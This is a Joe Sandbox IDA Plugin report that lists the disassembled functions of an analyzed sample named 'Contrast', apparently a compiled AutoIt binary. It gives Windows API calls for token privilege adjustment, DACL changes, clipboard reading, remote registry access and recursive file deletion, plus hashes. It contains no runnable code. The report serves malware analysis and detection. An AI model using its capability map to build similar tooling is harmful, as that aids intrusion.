                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wfsopen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 197181222-0
                                                                                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                        • Instruction ID: 32d3da549bdb2f715027d4489c15a5ff5217fc6767f8d308a5e228ae32d0a06f
                                                                                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                        • Instruction Fuzzy Hash: 56B0927644020C77CE012A82EC03A593F29AB80668F408020FB0C5C162B673A6A09689
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00574005: FindFirstFileW.KERNEL32(?,?), ref: 0057407C
                                                                                                                                          • Part of subcall function 00574005: DeleteFileW.KERNEL32(?,?,?,?), ref: 005740CC
                                                                                                                                          • Part of subcall function 00574005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 005740DD
                                                                                                                                          • Part of subcall function 00574005: FindClose.KERNEL32(00000000), ref: 005740F4
                                                                                                                                        • GetLastError.KERNEL32 ref: 0057C292
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
• String ID:
• API String ID: 2191629493-0
• Opcode ID: ff35ef91a70ea030df371f31008cee3eacd92a37d9d96b97def8e8e8ef7494f3
• Instruction ID: e2bff82d2f2ae056b731853d3de473d6b00ea3751739cf50c85b3cde027d364c
• Opcode Fuzzy Hash: ff35ef91a70ea030df371f31008cee3eacd92a37d9d96b97def8e8e8ef7494f3
• Instruction Fuzzy Hash: CBF08C322102118FDB10EF59E848FAABBE5BF89320F05C419F9498B392CB70BC41DB94
APIs
  • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0059D208
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059D249
• GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0059D28E
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059D2B8
• SendMessageW.USER32 ref: 0059D2E1
• _wcsncpy.LIBCMT ref: 0059D359
• GetKeyState.USER32(00000011), ref: 0059D37A
• GetKeyState.USER32(00000009), ref: 0059D387
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059D39D
• GetKeyState.USER32(00000010), ref: 0059D3A7
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059D3D0
• SendMessageW.USER32 ref: 0059D3F7
• SendMessageW.USER32(?,00001030,?,0059B9BA), ref: 0059D4FD
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0059D513
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0059D526
• SetCapture.USER32(?), ref: 0059D52F
• ClientToScreen.USER32(?,?), ref: 0059D594
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0059D5A1
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0059D5BB
• ReleaseCapture.USER32 ref: 0059D5C6
• GetCursorPos.USER32(?), ref: 0059D600
• ScreenToClient.USER32(?,?), ref: 0059D60D
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0059D669
• SendMessageW.USER32 ref: 0059D697
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D6D4
• SendMessageW.USER32 ref: 0059D703
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0059D724
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0059D733
• GetCursorPos.USER32(?), ref: 0059D753
• ScreenToClient.USER32(?,?), ref: 0059D760
• GetParent.USER32(?), ref: 0059D780
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0059D7E9
• SendMessageW.USER32 ref: 0059D81A
• ClientToScreen.USER32(?,?), ref: 0059D878
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0059D8A8
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D8D2
• SendMessageW.USER32 ref: 0059D8F5
• ClientToScreen.USER32(?,?), ref: 0059D947
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0059D97B
  • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
• GetWindowLongW.USER32(?,000000F0), ref: 0059DA17
Strings
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3977979337-4164748364
• Opcode ID: b2451d40486639f739bc4b38d9ddf1974967c89a730f9a21a5f389ddc92ff9d0
• Instruction ID: c39f906daa684cd4331a931d0dbc05e8c86a438795b416eda04271d49ab5c83e
• Opcode Fuzzy Hash: b2451d40486639f739bc4b38d9ddf1974967c89a730f9a21a5f389ddc92ff9d0
• Instruction Fuzzy Hash: E742A035604341AFDB24DF28C848BAABFF5FF89310F140A19F695872A1D771D858EB61
APIs
  • Part of subcall function 00569399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005693E3
  • Part of subcall function 00569399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00569410
  • Part of subcall function 00569399: GetLastError.KERNEL32 ref: 0056941D
• _memset.LIBCMT ref: 00568F71
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00568FC3
• CloseHandle.KERNEL32(?), ref: 00568FD4
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00568FEB
• GetProcessWindowStation.USER32 ref: 00569004
• SetProcessWindowStation.USER32(00000000), ref: 0056900E
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00569028
  • Part of subcall function 00568DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568F27), ref: 00568DFE
  • Part of subcall function 00568DE9: CloseHandle.KERNEL32(?,?,00568F27), ref: 00568E10
Strings
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
• API String ID: 2063423040-1027155976
• Opcode ID: d2230e083729568c0e130014ee901f03264494c4e64028ff80953563b9d11663
• Instruction ID: 39e1093056ad299290247ecb5920aa9dcfe43d2d51f39be399ebb42912dfed4f
• Opcode Fuzzy Hash: d2230e083729568c0e130014ee901f03264494c4e64028ff80953563b9d11663
• Instruction Fuzzy Hash: 748136B190020ABFDF119FA4DD49AEEBF79BF45314F144119F910A72A1DB328A19EB60
APIs
• OpenClipboard.USER32(005A0980), ref: 0058465C
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0058466A
• GetClipboardData.USER32(0000000D), ref: 00584672
• CloseClipboard.USER32 ref: 0058467E
• GlobalLock.KERNEL32(00000000), ref: 0058469A
• CloseClipboard.USER32 ref: 005846A4
• GlobalUnlock.KERNEL32(00000000), ref: 005846B9
• IsClipboardFormatAvailable.USER32(00000001), ref: 005846C6
• GetClipboardData.USER32(00000001), ref: 005846CE
• GlobalLock.KERNEL32(00000000), ref: 005846DB
• GlobalUnlock.KERNEL32(00000000), ref: 0058470F
• CloseClipboard.USER32 ref: 0058481F
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
• String ID:
• API String ID: 3222323430-0
• Opcode ID: bcb20be6d01bcad624bf887758bfac3072ccf64d76d886ba3e78ed25c6dd180d
• Instruction ID: 919fa1ea7075c44278b01d112d12e59ffaa5374a46c6e42b25040fb5f9a218ff
• Opcode Fuzzy Hash: bcb20be6d01bcad624bf887758bfac3072ccf64d76d886ba3e78ed25c6dd180d
• Instruction Fuzzy Hash: 5B518035244202ABD700FF60EC49F6E7BA8BFA6B51F000529F946E31D1EB7099099F66
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0057F5F9
• _wcscmp.LIBCMT ref: 0057F60E
• _wcscmp.LIBCMT ref: 0057F625
• GetFileAttributesW.KERNEL32(?), ref: 0057F637
• SetFileAttributesW.KERNEL32(?,?), ref: 0057F651
• FindNextFileW.KERNEL32(00000000,?), ref: 0057F669
• FindClose.KERNEL32(00000000), ref: 0057F674
• FindFirstFileW.KERNEL32(*.*,?), ref: 0057F690
• _wcscmp.LIBCMT ref: 0057F6B7
• _wcscmp.LIBCMT ref: 0057F6CE
• SetCurrentDirectoryW.KERNEL32(?), ref: 0057F6E0
• SetCurrentDirectoryW.KERNEL32(005CB578), ref: 0057F6FE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F708
• FindClose.KERNEL32(00000000), ref: 0057F715
• FindClose.KERNEL32(00000000), ref: 0057F727
Strings
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*$SW
• API String ID: 1803514871-1897071871
• Opcode ID: 222ac034ca68467f28074063ed468bd42445c6b9751ed7416006fae1708b8684
• Instruction ID: 4deaa6d075b7c40beab3f995b9033f32fbd32318c2900eed5b7abc1c08e236f7
• Opcode Fuzzy Hash: 222ac034ca68467f28074063ed468bd42445c6b9751ed7416006fae1708b8684
• Instruction Fuzzy Hash: 8E3193715512196EDB14DFB4EC8DAEE7BACFF59321F104165E809E21E0EB30DA48EB60
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0057CDD0
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057CE24
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057CE49
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057CE60
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0057CE87
                                                                                                                                        • __swprintf.LIBCMT ref: 0057CED3
                                                                                                                                        • __swprintf.LIBCMT ref: 0057CF16
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        • __swprintf.LIBCMT ref: 0057CF6A
                                                                                                                                          • Part of subcall function 005338C8: __woutput_l.LIBCMT ref: 00533921
                                                                                                                                        • __swprintf.LIBCMT ref: 0057CFB8
                                                                                                                                          • Part of subcall function 005338C8: __flsbuf.LIBCMT ref: 00533943
                                                                                                                                          • Part of subcall function 005338C8: __flsbuf.LIBCMT ref: 0053395B
                                                                                                                                        • __swprintf.LIBCMT ref: 0057D007
                                                                                                                                        • __swprintf.LIBCMT ref: 0057D056
                                                                                                                                        • __swprintf.LIBCMT ref: 0057D0A5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                        • API String ID: 3953360268-2428617273
                                                                                                                                        • Opcode ID: a657358efce2dbc10c1391f88bf30a23a8809391bbdb969c352ba704a9d9135b
                                                                                                                                        • Instruction ID: 3686d6d60f7a5a255577fda6e4bdf0bbf50325e4fad5e52340e890ee512f2a93
                                                                                                                                        • Opcode Fuzzy Hash: a657358efce2dbc10c1391f88bf30a23a8809391bbdb969c352ba704a9d9135b
                                                                                                                                        • Instruction Fuzzy Hash: 4EA14DB1404306ABD710EBA4D989DAFBBECFFD5701F40491DF59582191EB30EA49CBA2
                                                                                                                                        APIs
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590FB3
                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,005A0980,00000000,?,00000000,?,?), ref: 00591021
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00591069
                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 005910F2
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00591412
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0059141F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                        • API String ID: 536824911-966354055
                                                                                                                                        • Opcode ID: fd9883dac165e21618366a6d9a0d822cd84be101b37d400ee2ec1804b9887219
                                                                                                                                        • Instruction ID: 6531727f4fe1fe7f1bac2781612c35d2b34b07c0a1699174ccbd469e1fba95ff
                                                                                                                                        • Opcode Fuzzy Hash: fd9883dac165e21618366a6d9a0d822cd84be101b37d400ee2ec1804b9887219
                                                                                                                                        • Instruction Fuzzy Hash: 4B028E75200A129FDB14EF25D849E2ABBE5FF89710F04895CF84A9B3A1CB30ED41CB95
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0057F756
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F76B
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F782
                                                                                                                                          • Part of subcall function 00574875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00574890
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0057F7B1
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057F7BC
                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0057F7D8
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F7FF
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F816
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0057F828
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(005CB578), ref: 0057F846
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F850
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057F85D
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057F86F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                        • String ID: *.*$jW
                                                                                                                                        • API String ID: 1824444939-3710049800
                                                                                                                                        • Opcode ID: 79393d629af56379cce4a0eafea3bcc2d5079c84f4eac39e67df18ac756d4ae1
                                                                                                                                        • Instruction ID: 8d90adb8e93718e9d7856db0e0bc1423188ce37bc327196ee3a3653c4da11f2c
                                                                                                                                        • Opcode Fuzzy Hash: 79393d629af56379cce4a0eafea3bcc2d5079c84f4eac39e67df18ac756d4ae1
                                                                                                                                        • Instruction Fuzzy Hash: 9831B57550021A6EDB14DFB4EC49AEE7FACFF59321F104165E808A31E1D730CE45AB61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00568E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568E3C
                                                                                                                                          • Part of subcall function 00568E20: GetLastError.KERNEL32(?,00568900,?,?,?), ref: 00568E46
                                                                                                                                          • Part of subcall function 00568E20: GetProcessHeap.KERNEL32(00000008,?,?,00568900,?,?,?), ref: 00568E55
                                                                                                                                          • Part of subcall function 00568E20: HeapAlloc.KERNEL32(00000000,?,00568900,?,?,?), ref: 00568E5C
                                                                                                                                          • Part of subcall function 00568E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568E73
                                                                                                                                          • Part of subcall function 00568EBD: GetProcessHeap.KERNEL32(00000008,00568916,00000000,00000000,?,00568916,?), ref: 00568EC9
                                                                                                                                          • Part of subcall function 00568EBD: HeapAlloc.KERNEL32(00000000,?,00568916,?), ref: 00568ED0
                                                                                                                                          • Part of subcall function 00568EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00568916,?), ref: 00568EE1
                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00568931
                                                                                                                                        • _memset.LIBCMT ref: 00568946
                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00568965
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00568976
                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 005689B3
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005689CF
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 005689EC
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005689FB
                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00568A02
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00568A23
                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00568A2A
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00568A5B
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00568A81
                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00568A95
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3996160137-0
                                                                                                                                        • Opcode ID: ea01dede8fbd5d3fd877cfad86af1f6d80dc3c5e213e0a443e0062538d8af699
                                                                                                                                        • Instruction ID: 47fbb05b22554f740c06e6980e112fc3d8f524c60c24c83264f63f4fc109150d
                                                                                                                                        • Opcode Fuzzy Hash: ea01dede8fbd5d3fd877cfad86af1f6d80dc3c5e213e0a443e0062538d8af699
                                                                                                                                        • Instruction Fuzzy Hash: C961577590020ABFDF00DFA1DC49AFEBB79FF44310F04826AE915A7290DB319A04DB60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0059147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059040D,?,?), ref: 00591491
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590B0C
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00590BAB
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00590C43
                                                                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00590E82
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00590E8F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1240663315-0
                                                                                                                                        • Opcode ID: ddf351ad794a99d9511c86f81d56f9f7a147492d3f5608112a63e2e2a457940e
                                                                                                                                        • Instruction ID: 2f8467c3a8051320592cd96948c24fc0cfbe773e6c2fdb29e0d8f2aab6fd1618
                                                                                                                                        • Opcode Fuzzy Hash: ddf351ad794a99d9511c86f81d56f9f7a147492d3f5608112a63e2e2a457940e
                                                                                                                                        • Instruction Fuzzy Hash: 85E16A71204211AFCB14DF28C895E2BBBE9FF89714F04996DF84ADB2A1DA30ED45CB51
                                                                                                                                        APIs
                                                                                                                                        • __swprintf.LIBCMT ref: 00574451
                                                                                                                                        • __swprintf.LIBCMT ref: 0057445E
                                                                                                                                          • Part of subcall function 005338C8: __woutput_l.LIBCMT ref: 00533921
                                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00574488
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00574494
                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 005744A1
                                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 005744C1
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 005744D3
                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 005744E2
                                                                                                                                        • LockResource.KERNEL32(?), ref: 005744EE
                                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0057454F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1433390588-0
                                                                                                                                        • Opcode ID: 3d065c12931802dc6946354b026fb42a5aa260ca2d58d8f2b15b09e6670af4b7
                                                                                                                                        • Instruction ID: 9f85fa473863589f15de78578ed6d104e8ab38fbb3a45bea2e558d66f601366e
                                                                                                                                        • Opcode Fuzzy Hash: 3d065c12931802dc6946354b026fb42a5aa260ca2d58d8f2b15b09e6670af4b7
                                                                                                                                        • Instruction Fuzzy Hash: 66318D7150121AAFDB119FA0FC48ABB7FA9FF05301F008826F91AD2190E730DA10EBA1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                        • Opcode ID: e7153ee9f9660612a9f9d87a5151dbd8eaa0a3c6d12dd74cc0ae979ec7110fed
                                                                                                                                        • Instruction ID: 317932cad45bff82a674baef877ec98cb1b3b9673109c3b8c3c9bbbf0205240a
                                                                                                                                        • Opcode Fuzzy Hash: e7153ee9f9660612a9f9d87a5151dbd8eaa0a3c6d12dd74cc0ae979ec7110fed
                                                                                                                                        • Instruction Fuzzy Hash: 5F218D352016129FEB11AF20EC09B6E7BA8FF95725F00841AFD069B2A1DB34AD419F94
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00530284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005302A4
                                                                                                                                          • Part of subcall function 00574FEC: GetFileAttributesW.KERNEL32(?,00573BFE), ref: 00574FED
